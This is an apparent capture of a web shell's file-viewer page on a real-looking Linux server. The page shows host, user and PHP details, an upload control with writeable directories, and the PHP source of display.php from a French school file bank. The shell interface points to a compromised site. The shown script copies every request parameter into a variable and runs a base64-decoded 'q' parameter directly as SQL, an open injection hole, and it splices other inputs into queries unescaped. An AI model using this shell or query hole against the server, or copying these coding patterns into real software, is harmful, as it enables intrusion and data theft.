Samx Here
n1udSecurity


Server : Apache
System : Linux ks5.tuic.fr 6.1.0-18-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64
User : pragmatice ( 1003)
PHP Version : 8.2.24
Disable Function : NONE
Directory :  /home/pragmatice/aftrn/banque_HS/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/pragmatice/aftrn/banque_HS/display.php
<?php
session_start();
/***************************************************************************
 *
 *   date                 : Septembre 2002
 *   copyright            : (c) 2002 B&eacute;atrice Arnou
 *   email                : bea@cartables.net
 *
 *   Tout usage de ces scripts doit faire l'objet d'une demande d'autorisation 
 *   et ces mentions ne doivent pas &ecirc;tre retir&eacute;es ou modifi&eacute;es.
 *
 ***************************************************************************/

define(IN_AFT, true);

require "lib.php";

if (isset($_SESSION['infos'])) {
  extract($_SESSION['infos']);
 }
else
{
  Header("Location:login.php\n\n");
}

// R&eacute;cup&eacute;ration des variables
while (list($key, $val) = each($_POST)) {$$key=$val;}
while (list($key, $val) = each($_GET))  {$$key=$val;}

if (isset($q)) { $query = base64_decode($q); }

hautpage();

/******** Pagination ***********/

//$restotal = mysqli_query($conx,"select count(nomcourt) as numtotal from fichiers");
//$numtotal = mysqli_result($restotal,0,"numtotal");
//mysqli_free_result($restotal);

// Nbre de fichiers affich&eacute;s par page (si nbrenew n'est pas utilis&eacute;)
if (!isset($FichiersParPage)) { $FichiersParPage = FICHIERS_PAR_PAGE; }
// On active l'affichage par pages (il sera d&eacute;sactiv&eacute; si nbrenew est utilis&eacute;)
$parpage = true;

// A combien de fichiers depuis le d&eacute;but, on commence l'affichage ?
if (!isset($min)) { $min = 0; }
// Quelle est la page en cours ?
if (!isset($npage)) { $npage = 1; }

$limit = " LIMIT $min,$FichiersParPage ";

/******** Fin de Pagination ***********/

if (!isset($query)) {

// Construction de la requ&ecirc;te
$query = "select fichiers.*, categories.*, users.usernom as username, users.useremail as useremail from fichiers, categories, users where 1 and valide='O' ";
$pre=" and ";

// Cat&eacute;gorie
$categorie2 = addslashes($categorie);
if ($categorie and $categorie != "*") {
  $query .= " $pre categorie='$categorie2'";
  $categ = $categorie;
} else {
  $categ = "Toutes les cat&eacute;gories";
}

if (!$formatpattern || !sTRlen($formatpattern)) $formatpattern="*";
if (!$fpattern || !sTRlen($fpattern)) $fpattern="*";
if (!$dpattern || !sTRlen($dpattern)) $dpattern="*";

if ($fpattern != "*") {
   $fpattern = strtolower(str_replace("*","%",$fpattern));
   $query .="$pre nomcourt like '%$fpattern%'";
}

if ($formatpattern != "*"){
   $formatpattern = str_replace("*","%",$formatpattern);
   $formatpattern = strtolower(str_replace("'","''",$formatpattern));
   $query .="$pre format like '%$formatpattern%'";
}

if ($nuser and $nuser != "*") {
   $query .= " $pre user like '$nuser'";
}

if($description and $description != "*") {
   $description = str_replace("*","%",$description);
   $description = cleanchaine($description);        
   $description = strtolower(addslashes($description));
   $query .= " $pre desc_sans_accent like '%$description%'";
}

$query .= " $pre fichiers.categorie = categories.id ";
$query .= " $pre fichiers.user = users.userid ";

if(!$order) $order="time_stamp"; 

$query .= " order by $order";

if ($order=="time_stamp" || $order=="size" || $order=="downloads") $query .= " desc"; 

} // Si la requ&ecirc;te n'existe pas d&eacute;j&agrave;

if ($nbrenew) {
  $parpage = false;
  $query2  .=" LIMIT $nbrenew";
} else {
  // Pagination
  $numtotal = mysqli_num_rows(mysqli_query($conx,$query.$query2));
  if (!isset($fin)) {
    $query2  .= $limit; 
  }
}

$query_finale = $query.$query2;

//print "$query_finale<br>";

$result = mysqli_query($conx,$query_finale);
$num    = mysqli_num_rows($result);

if ($nbrenew) {
  $numtotal = max($num,$nbrenew);
}

if ($parpage) {
   // Nbre de pages n&eacute;cessaires pour l'affichage
   $NbrePages = ceil($numtotal / $FichiersParPage);
   $n = 1;
   while ($n <= $NbrePages) {
     $min = ($n-1) * $FichiersParPage;
     $urlpage[$n] = "display.php?min=$min&npage=$n&q=".base64_encode($query);
     $n++;
   }
}

if ($num == 0) {
  erreur("Aucun fichier trouv&eacute; !","Retour","javascript:history.back()",EMAIL_CONTACT,SUJET_CONTACT);
}
?>
<div align=center class=petit>
<a href="<?php print URLBANQUE ?>/">Retour &agrave; l'accueil</a>
</div>

<?php include "pagination.php"; ?>

<div class="maligne" /></div>
<table border=0 bgcolor="<?php print ROUGE ?>" cellspacing=0 cellpadding=0 align=center width=100%>
<tr>
<th>
<div align="center" style="color:<?php print JAUNEPALE ?>;">
<?php if ($numtotal > 1) { $pluriel = "s"; } else { $pluriel = ""; } ?>
&nbsp;<?php print $numtotal." document".$pluriel." trouv&eacute;".$pluriel."&nbsp;"; ?>
</div>
</th>
</tr>
<tr>
<td>
   <table border=0 bgcolor="<?php print JAUNE ?>" cellspacing=0 cellpadding=4 bordercolor="<?php print ROUGE ?>" width=100% style="border-left: <?php print ROUGE ?> 1px solid; border-top: <?php print ROUGE ?> 1px solid">
   <tr>
   <th align=left class=petit width=30% style="border-bottom: <?php print ROUGE ?> 1px solid; border-right: <?php print ROUGE ?> 1px solid;">
     Nom&nbsp;de&nbsp;fichier
   </th>
   <th align=center class=petit style="border-bottom: <?php print ROUGE ?> 1px solid; border-right: <?php print ROUGE ?> 1px solid;">
     Cat&eacute;gorie
   </th>
   <th align=center class=petit width=15% style="border-bottom: <?php print ROUGE ?> 1px solid; border-right: <?php print ROUGE ?> 1px solid;">
     Options
   </th>
   <th align=center class=petit style="border-bottom: <?php print ROUGE ?> 1px solid; border-right: <?php print ROUGE ?> 1px solid;">
     Format
   </th>
   <th align=center class=petit style="border-bottom: <?php print ROUGE ?> 1px solid; border-right: <?php print ROUGE ?> 1px solid;">
     Taille
   </th>
   <th align=center class=petit style="border-bottom: <?php print ROUGE ?> 1px solid; border-right: <?php print ROUGE ?> 1px solid;">
     Exp&eacute;diteur
   </th>
   <th align=center class=petit style="border-bottom: <?php print ROUGE ?> 1px solid; border-right: <?php print ROUGE ?> 1px solid;"">
     Date
   </th>
   </tr>

<?php 
$color = JAUNE;
while ($row = mysqli_fetch_array($result)) {
  while (list ($key, $val) = each ($row)) {
    @$$key = $val;
  }
  $size        = number_format($size,0,","," ");
  $size        = str_replace(" ","&nbsp;",$size);
  $downloads   = number_format($downloads,0,","," ");
  $downloads   = str_replace(" ","&nbsp;",$downloads);
  $time_stamp  = date("d/m/Y",$time_stamp);

  $filename    = $dir."/".$nomcourt;
  
  // Transformation des urls en liens cliquables
 // $description2 = eregi_replace("([[:alnum:]]+)://([^[:space:]]*)([[:alnum:]#?/&=])","<a href=\"\\1://\\2\\3\" target=\"_blank\" style=\"font-size:8pt\">\\1://\\2\\3</a>",$description); 
 // $description2 = eregi_replace("([^@\" ]+@([a-zA-Z0-9\-]+\.)+[a-zA-Z0-9\-]{2,4})","<a href=\"mailto:\\1\" style=\"font-size:8pt\">\\1</a>", $description2);
    $description2 = make_links($description);

  if ($color == JAUNE) { $color = JAUNEPALE; } else { $color = JAUNE; }
  print "<tr bgcolor=$color>\n";
  affiche_record($idfile,$nomcourt,$categorie,
                 utf8_encode($format),$time_stamp,
                 $size,$downloads,$user,$local,
                 utf8_encode($nom),$dir,$filename,utf8_encode($description2),
                 $Sessusernom,$Sessuseremail,$Sessuserid,
                 utf8_encode($username),$useremail);
  // $Sessusernom est le nom d'utilisateur stock&eacute; dans les variables de session
  // $user est le code utilisateur stock&eacute; dans la table fichiers (celui qui a post&eacute; le fichier)
  // $username est nom de l'utilisateur correspondant &agrave; $user et r&eacute;cup&eacute;r&eacute; dans la table users

  print "</tr>\n";
}
?>
</table>
</td>
</tr>
</table>

<?php

include "pagination.php";

baspage(); 

?>

SAMX